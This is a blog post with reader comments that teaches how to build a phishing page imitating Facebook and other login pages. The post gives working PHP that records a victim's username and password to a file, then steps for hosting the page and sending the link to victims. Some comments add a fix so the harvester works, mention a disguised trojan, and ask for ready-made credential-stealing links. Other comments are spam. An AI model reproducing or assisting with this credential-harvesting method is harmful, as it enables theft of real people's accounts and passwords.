Creating a fake ( Phishing ) page of gmail,facebook ,yahoo, myspace etc.

received many Emails from my blog readers requesting me to make Fake /Phisher page for various websites like orkut ,twitter , GMail , Face book ...etc .I have already written some tutorials  on how to hack Face book , GMail using a fake/phishing page . But many had doubts , problems . To clear all your doubts today i am writing  a tutorial on how you can create a fake/phisher page for any website that you want  Follow the steps given below to create your own phishing page

 



How to Make a Phisher/Fake Page For Any Website 

1. First open the website in a browser for which you want to create a phishing page . now press the Ctrl+ S to save the page.

example:
https://www.facebook.com

Now open facebook.html (something.html) in a notepad .Now search for the string 
"action" and change the address to post.php  Finally save it



3. Now we have to create post.php .For this open notepad , copy/paste the following code in it and save it as post.php
 

<?php
header ('Location: https://www.facebook.com');
$handle = fopen("hack.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


3. Now create a blank text file hack.txt in the folder.
 
Note :- By default the victim will be redirected to facebook.com once he clicks login ,If you want you can change the address, you can do it  by changing the www.facebook.com to any  address you desire
 
4.Now create an account in Free web hosting sites, which supports php like , T35.com or 000webhost.com , 5gbfree.com  


5. Now upload all the files which we created 
 
6. Now send the  facebook.htm link to the victim , once  he enters the information and logins in , He will be redirected to the website which we did in step three

7. Now to see the victims password login to your hosting account, there you 'll see new  file hack.txt , open it to see the victims user-id and password  
Hope you enjoyed this tutorial ,If you have any doubts please feel free to post a comment


Comments

  1. I gained more out of this than I did with "Phishing Dark Waters-The Offensive and Defensive Sides of Malicious E-mails", Hadnagy/Fincher's, 188 page book. Excellent!
    www.cyberevoblog.blogspot.ca

    ReplyDelete
  2. Thank you for the information, I think this article is very useful for all who read it.
    .

    ReplyDelete
  3. Thanks Master. Its a Pro-TRICK

    ReplyDelete
  4. STEP 8:YOU WILL GET SERVER.EXE LIKE HOW I GOT ...WHEN VICTIM CLICKS ON SERVER.EXE OUR FAKE MESSAGE ABOUT DOTNET WILL APPEAR SO OUR VICTIM WILL NOT GET DOUBT ABOUT OUR ATTACK. www.gmail.com facebook login

    ReplyDelete
  5. Gmail customer support is always ready on their toes to serve you and help you out of your struggling situation.Users should have a strong password to avoid such situation before setting the Gmail password here we mention some tips to make your password stronger, that way your account too. http://800support.net/yahoo-support/how-to-contact-yahoo/

    ReplyDelete
  6. Ever wanted to get free Instagram Followers and Likes?
    Did you know you can get them ON AUTO-PILOT & TOTALLY FOR FREE by registering on Add Me Fast?

    ReplyDelete
  7. Pls. I am new to this and very interested to have the knowledge, can anyone send me already made link for user name and password hacking. Send to billbadeh@yahoo.com. pls.

    ReplyDelete
  8. Pls. Can anyone explain better. How do I open facebook.html in notepad. Do I have to copy and paste the Facebook content info. On the notepad or import it into notepad? I need reply urgent pls. billbadeh@yahoo.com. I want to have hacker prof. As a friend that will guide me better pls

    ReplyDelete
  9. I am not sure whether it is a mistake or not (though I know little php) but this does not work for me. In post.php there is a line foreach($_GET as $variable => $value) but as Facebook is using method = POST so we have to use $_POST instead of $_GET. otherwise value will not be caught in hack.txt file. this works for me. that's why I have shared it.

    ReplyDelete
  10. Our Yahoo Technical Support Number is always available to resolve any issues related to your account. Call our Yahoo Customer Support Number +1-888-589-0410 and give all your to us. We are always there to help you out.

    ReplyDelete
  11. Clearing of Gmail information from the account is only done in case of the fix of some glitch or error for that the user should open the device settings application after that the user should click the option “APPS and notifications” further should click “Gmail” and should then go to “storage” after that the user should click the option “clear data” if required then for more information the user should take help from the Gmail experts.
    Gmail Help UK

    ReplyDelete
  12. Excellent information. It will also help me to prevent such phishing attacks with my account as well and these kind of information is necessary for tech people to make them aware for safety. Thanks for sharing

    Python | PHP & MySQL Training | HTML & CSS (Web Designing) Training | Digital Marketing Course

    ReplyDelete
  13. can you email me Im having trouble doing thiis here and now in 2020

    ReplyDelete
  14. Im not sure what to do whem I get to t35? email me please
    bayray77@yahoo.com

    ReplyDelete

Post a Comment